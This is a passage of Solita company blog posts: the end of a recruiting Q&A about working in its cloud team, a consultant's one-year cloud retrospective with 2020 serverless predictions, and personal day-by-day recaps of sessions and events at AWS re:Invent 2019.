Mostly a myth. It depends on the project – some require on-site presence from time to time, but a lot work can be done flexibly in the office or remotely. No one will be forced to sit at the customer site alone. Projects include both individual and team work. This, too, largely depends on the project and the employee’s own preferences.

#10 Solita doesn’t have a billing-based bonus.

True. If we have one, no one has told me.

(Ed. Note: Solita’s compensation model for experts is based on a monthly salary.)

#11 Solita only works with customers in the public sector.

False. Solita has both public and private sector customers, from many different industries.

(Ed. Note: In 2019, around 55% of our Cloud customers were from the private sector.)

#12 Projects require long-term commitment, so you’ll be working on the same project for a long time.

True, if that’s what you want! When I started at Solita, my team lead asked me in advance what kind of projects I’d like to be part of, and what would be an absolute no-no. I’m happy to note that my wishes have actually been heard. But it might be because I’m not picky. Projects can last from a few days to years, and people might be working on several projects at the same time. Of course, you can also rotate between projects, so a final commitment isn’t necessary.

Helinä was interviewed by Minna Luiro who’s responsible for the Cloud unit’s recruiting and employer image at Solita. Do you have more questions or thoughts around the above topics? You can reach out to Minna: +358 40 843 6245 or minna.luiro@solita.fi.

If you’re excited about the idea of joining Solita’s Cloud team, send us an open application. You can also browse our vacancies.

One year of cloud

It has been 12 months since I took a leap into exciting world of cloud consulting. It is time to look back and throw some predictions for 2020.

I started my career with cloud at Hewlett Packard aeons ago. At that time the cloud was really immature and we had a huge variety of problems just on basic IaaS deployments. However even then the benefits were so imminent that we thought it was really worth it. Customers were eager to have faster deployments, so somewhat unstable platforms did not seem big problem at all.

Along came OpenStack with its promise to simplify and unify things. I still have nightmares about upgrading OpenStack installations (Although I have heard that it has gotten better now). Yes we did some NFV -related things with it as it was the only option back then.

The world has changed a lot during these years and in the last 12 months I think the pace is speeding up even more.

Joining Solita

I joined Solita cloud consulting unit last January with high hopes and a little bit scared. But after the warm welcome I got from my colleagues (especially Antti Heinonen) and comprehensive introduction to working at Solita I immediately felt at ease (thanks again Antti). This would be the place where I can make a real impact. Working for Solita has proven to be something that I imagined it would be. Lots of freedom but also lots of responsibility to take. This is not for everyone but for me it works.

During these months I have seen the demand for cloud competency in Finland has risen into a whole new level. Customers are really looking to get serious with cloud adoption, if they have not yet done so. Microservice architecture with containers and FaaS based offering is really taking off even more.

My projects have varied a lot during this year, ranging from simple cloud deployments to complete cloud strategy and governance projects.
One of the key skills here is that you need to put yourself into the shoes of the client and you really need to be aware of all aspects of modern business. Only that way you really can evaluate how to use the cloud for the clients best interests. I wont go into details in this posts on what has happened on the tech side during these 12 months as the cloud evolves so fast that it is pointless to list all new features.

Crystal ball

I estimate that there is some demand for on-premises cloud during 2020. Azure stack and AWS outpost both seem to be pretty interesting and I hope we see some cases with those. The price tag is quite big, but not impossible, if you have a real use for them.
Serverless will keep on winning as the benefits with it are so obvious, even if there are some hiccups with the management layer from time to time (this needs its own blog entry).

It’s difficult to make predictions, especially about the future. But I will make one clear prediction that FaaS will rule even more during 2020. There are some clear benefits with especially DevOps minded developers. It will take the focus away from infrastructure even more and true IaC deployments are easier to do. It is more cost effective as resources are only used when code is executed. Scaling is easier and more imminent than on legacy VM’s or containers.

There are some rules of thumb to keep on mind when working with FaaS services. Limit single FaaS to do a single action, limit scope and keep functions lightweight. Pay attention when using libraries, they have a tendency to slow down functions. Keep functions isolated, don’t call functions from other functions.

Cold starts

With Faas there is the inevitable discussion about cold starts. Problem is that when running Functions which are not “warm” it takes some time to bring the infra up and running. Usually delay is around 2-3 seconds which is a deal breaker for some usage. But there are some workarounds for this and vendors are constantly improving this.

Also AWS is a bit ahead here and announced provisioned concurrency at 2019 Re:invent which basically keeps your lambdas “warm” and cuts the latency. Look for a summary here https://serverless.com/blog/aws-lambda-provisioned-concurrency/

Check out Mikhail Shilkov analysis on coldstarts with AWS, Azure and GCP https://mikhail.io/serverless/coldstarts/big3/

To summarize last year: It has been very busy year for our team and I think in 2020 we are going to do some great things again.
I hope to see some new colleagues in our team, so if you are interested in working at Solita dont hesitate to contact me to have a chat at +358 401897586 toni.kuokkanen@solita.fi or tuwww @IRCnet

My Summary of AWS re:Invent 2019

The re:Invent event for 2019 is officially over. However, the learning and innovation is never stopping. It was a full week of learning new things, mingling with other AWS users and basically having a good time in Las Vegas. You can continue learning by following AWS Events Youtube channel: https://www.youtube.com/channel/UCdoadna9HFHsxXWhafhNvKw

Personally, I would like to thank all my colleagues, customers of Solita and employees of the event organisation for a just magnificent conference. Thanks!

As fresh as I could be after a re:Invent.

View of Oakland in the second picture was very pretty. The gentlemen next to me from Datadog said that he has landed to SFO tens of times and our plane’s approaching direction was the first time also for him. Amazing view!

It’s not just about the services, actually it’s more about having the bold mindset to try new things

You don’t have to be an expert of everything what you do. If you are, it probably means that you are not following what is out there and you are doing familiar stuff to yourself repeatedly. I don’t say that you have to always be Gyro Gearloose. I mean that you should push the limits a bit, take controlled risk for reward and have the will to learn new things.

The three announcements that caught my attention

Fargate spot instances. That’s is what my project has been waiting for a while. It will do costs savings and make it possible to stop using ECS EC2 clusters in cost optimization manner. The rule of thumb is that you can save 70% of your costs with spot instances.

Outposts. I really like this idea that you can get AWS ecosystem integrated computing power next to in corporate data centers. The hybrid environments are only way for many customers. I would like to see in future some kind of control panel also inside Outpost. Now all information points out that you cannot basically to do any controlling for servers inside the Outposts in higher than OS level (e.g. login in via SSH or Remote desktop).

Warm Lambda’s. I think the most of Lambda developers have thought about warming up their Lambda resources manually via CloudWatch events etc. This simplifies the work as is should have always been. Now you can be sure that I there is request coming you will have some warm computing capacity to serve the request fast. The pricing starts from 1,50 $/month/128MB to have one provisioned concurrency (=warm lambda).

re:Play 2019 photos

We organized preparty at The Still in Mirage before.

Would you like to hear more what happens in re:Invent 2019? Sign up to our team’s Whatsapp group to chat with them and register to What happens in Vegas won’t stay in Vegas webinar to hear a whole sum-up after the event.

New call-to-action

My Thursday at AWS re:Invent 2019

Keynote by K Dr. Werner Vogels

Dr. Vogels is CTO at AWS. The keynote started with very detail information about virtual machine structure and evolvement during the last 20-25 years. He said that the AWS Nitro microVM is maybe the most essential component to provide secure and performance virtual machine environment. It has enabled rapid development of new instance types.

Ms. Clare Liguori (Principal Software Engineer, AWS) gave detail information about container services. In AWS there are two container platforms, the ECS EC2 with virtual machines and the serverless Fargate. If you compare scaling speed, the Fargate service can follow the needed capacity much faster and avoid under-provisioning (for performance) and over-provisioning (for cost saving). With ECS you have two scaling phases, first you need to scale up your EC2 instances and after that launch the tasks. 

During the keynote Mr. Jeff Dowds (Information Technology Executive, Vanguard) told their journey to AWS from corporate data center. Vanguard is registered investment advisor company located in USA and has over 5 trillion USA dollars in assets. Mr. Dowds convinced the benefit of public cloud by hard facts: -30% savings in compute costs, -30% savings in build costs, and finally 20x deployment frequency via automations. Changing the mindset of deployment philosophy, I think is the most important change for the Vanguard. Like said in the slides, they have now the ability to innovate!

Building a pocket platform as a service with Amazon Lightsail – CMP348

Mr. Robert Zhu (Principal Technical Evangelist, AWS) kept chalk talk session about the AWS Lightsail service. He started saying that this talk will be the most anti-talk in re:Invent in meaning of scaling, high availability and so on. The crowd was laughing loud.

In chalk talk the example deployed app was a progressive web app. PWA apps try to look as a native app e.g. in different phones. PWA’s typically use web browser in the background with shared UI code between operating systems.

The Lightsail service provides public static ip addresses and simple DNS service that you can use to connect the static ip address to your user-friendly domain name. It supports wildcard records and default record which is nice. The price for outbound traffic is very affordable: in 10 USD deal you get 2TB outbound traffic.

We used a lot of time how to configure a server in traditional way via ssh prompt: installing docker, acquiring certificate from Let’s encrypt etc.

The Lightsail service has no connection to VPC, no IAM roles, and so on. It is basically only a virtual server, so it is incompatible for creating modern public cloud enterprise experience.

Selecting the right instance for your HPC workloads – CMP409

Mr. Nathan Stornetta (Senior Product Manager, AWS) kept this builder session. He is a product manager for AWS ParallelCluster. In on-premises solutions you almost always need to do choices what to run and when to run. With public cloud’s elastic capacity, you don’t have to queue for resources and not to pay what you are not using.

HPC term stands for high performance computing which basically means that your workload does not fit into one server and you need a cluster of servers with high speed networking. Within the cluster the proximity between servers is essential.

In AWS there exists more than 270+ different instance types. To select right instance type needs experience about the workload and offering. Here is nice cheat sheet for instance types:

If your workload needs high performance disk performance in-and-out from the server the default AWS recommended choice would be to use Amazon FSx for Lustre cluster storage solution.

If you decide to use the Elastic file system EFS service, you should first think how much you need performance rather than what size you need. The design of EFS promise 200 MBps performance per each 1 TB of data. So, you should rather decide the needed performance so your application will have enough IO bandwidth in-use.

The newest choice is Elastic Fabric Adapter (EFA) which was announced a couple of months ago. More information about EFA can be found from here: https://aws.amazon.com/hpc/efa/

If you don’t have experience which storage would work the best for your workload, it is strongly recommended to test each one and make the decision after that.

Intelligently automating cloud operations – ENT305

This session was a workshop session. In workshop sessions there is multiple tables with same topic and in builder session there is one small table for each topic. So, there were more than hundred persons to do same exercise.

At first Mr. Francesco Penta (Principal Cloud Support Engineer, AWS) and Mr. Tipu Qureshi (Principal Engineer, AWS) gave a short overview of services that we are using in this session. I want to mention few of them. AWS Health keeps track of health of different services in your account. For example, it can alarm if your ACM certificate is not able to renew automatically (e.g. missing DNS records) or VPN tunnel is down.

The other service was AWS Auto Scaling predictive scaling. It is important thing if you want to avoid bigger under-provisioning. When just using e.g. CPU metric from last 5 minutes you are already late, bad. Also, if your horizontal scaling needs awhile to have new nodes in service, then the predictive scaling helps you to get more stable performance.

The workshop can be found here: https://intelligent-cloud-operations.workshop.aws/

I’m familiar with the tooling so I could have yelled Bingo as one of the first persons to finish. I was happy to finish early and go to hotel for short break before the Solita’s customer event and the re:Play. The re:Play starts at 8pm in Las Vegas Festival Grounds with music, food, drinks and more than 30 000 eye pairs.

Would you like to hear more what happens in re:Invent 2019? Sign up to our team’s Whatsapp group to chat with them and register to What happens in Vegas won’t stay in Vegas webinar to hear a whole sum-up after the event.

New call-to-action

My Wednesday at AWS re:Invent 2019

It was early morning today because the alarm clock woke up me around 6 am. The day started with Worldwide Public Sector Keynote talk at 7 am in Venetian Plazzo Ohall.

Worldwide Public Sector Breakfast Keynote – WPS01

This was my first time to take part to the Public Sector keynote. I’m not sure how worldwide it was. At least Singapore and Australia were mentioned, but I cannot remember anything special said about Europe.

Everyone who is following international security industry even a little could not have missed the fact who many cities, communities etc. have faced ransomware attack. Some victims paid the ransom in Bitcoins, some did not pay and many of victims are just quiet. The public cloud environment is a great way to protect your infrastructure and important data. Here is summary how to protect yourself:

The RMIT University from Australia has multiple education programs for AWS competencies and it was announced that they are now official AWS Cloud Innovation Centre (CIC). Typical students have some education background (eg. bachelor in IT) and they want to make some move in job market by re-education. Sounds great way!

The speaker Mr. Martin Bean from the RMIT showed the picture from Jetsons (1963, by Hanna Barber Production) that could already list multiple things that are invented for mass markets much later. Mr. Martin also reminded two things that got my attention: there are more people owning cellphone than toothbrush and 50 percent of jobs are going to transform to another in next 20 years.

Visit to expo area

After keynote I visited expo in Venetian Sands Expo area before heading to the Aria for the rest of Wednesday. The expo was huge, noisy, crowded etc. The more detail experience from last year was enough. At AWS Cloud Cafe I took panorama picture (click to zoom in) and that’s it, I was ready to leave.

I took the shuttle bus towards Aria. I was very happy that the bus driver dropped off us next the main door of Aria hotel which saves about average 20-30 minutes of queueing in Aria’s parking garage. Important change! On the way I passed the Manhattan of New York.

Get started with Amazon ElastiCache in 60 minutes – DAT407

Mr. Kevin McGehee (Principal Software Engineer, AWS) was the instructor for the ElasticCache Redis builder session. In the session we logged in to the Amazon console, opened Cloud9 development environment and then the just followed the clear written instructions.

The guide for builder session can be found from here: https://reinvent2019-elasticache-workshop.s3.amazonaws.com/guide.pdf

This session was about how to import data to the Redis via python and index and refine the data at the importing phase. In refinement the data becomes information with aggregated scoring, geo location etc. It’s easier to use by the requestor. That was interesting and looked easy.

Build an effective resource compliance program – MGT405

Mr.Faraz Kazmi (Software Development Engineer, AWS) held this builder session.

Conformance pack under AWS Config service was published last week. It can be integrated in AWS Organization level in account structure. With conformance packs you can make a group of config rules (~governance rules for common settings) easily in YAML format template and have consolidated view over those rules. There are few AWS managed packs currently available. “Operational Best Practices For PCI-DSS” pack is one for example.  It’s clear that AWS will provide more and more of those rule sets in upcoming months and so will also do the community via Github.

There are timeline view and compliance view of your all resources, so it makes this tool very effective to have consolidated view of compliance of resources.

You can find the material from here: https://reinvent2019.aws-management.tools/mgt405/en/

Btw. If you cannot find Conformance packs, you are possible using old Config service UI in the AWS Console. Make sure to switch to new UI. All new features are only done to the new UI.

The clean-up phase in the guide is not perfect. To addition to the guide you have to manually delete SNS topic and IAM roles that was created in the wizards. It was a disappointment that no sandbox account was provided.

Best practices for detecting and preventing data exposure – MGT408

Ms. Claudia Charro (Enterprise Solutions Architect, AWS) from Brasilia was the teacher in this session. This was very similar to my previous session that I was not aware. In both session we used Config rules and blocked public s3 usages.

The material can be found from here: https://reinvent2019.aws-management.tools/mgt408/en/cont/testingourenforcement.html

AWS Certification Appreciation Reception

The Wednesday evening started (as usually) with reception for certificated people at the Brooklyn Bowl. It is again nice venue to have some food, drinks, music and mingle with other people. I’m writing this around 8 pm so I left a bit early to get good night sleep for Thursday which is the last full day.

Brooklyn bowl outside Brooklyn bowl inside Brooklyn bowl bowling Brooklyn bowl dance floor

On the way back to my hotel (Paris Las Vegas) I found the version 3 Tesla Supercharge station which was the one of the first v3 stations in the world. It was not too crowed. The station was big when I’m comparing with the supercharger stations in Finland. The v3 Supercharger stations can provide up to 250kW charging power for Model 3 Long Range (LR) models, which has 75kWh battery size. I would have like to see the new (experimental) Cybertruck model.

Would you like to hear more what happens in re:Invent 2019? Sign up to our team’s Whatsapp group to chat with them and register to What happens in Vegas won’t stay in Vegas webinar to hear a whole sum-up after the event.

New call-to-action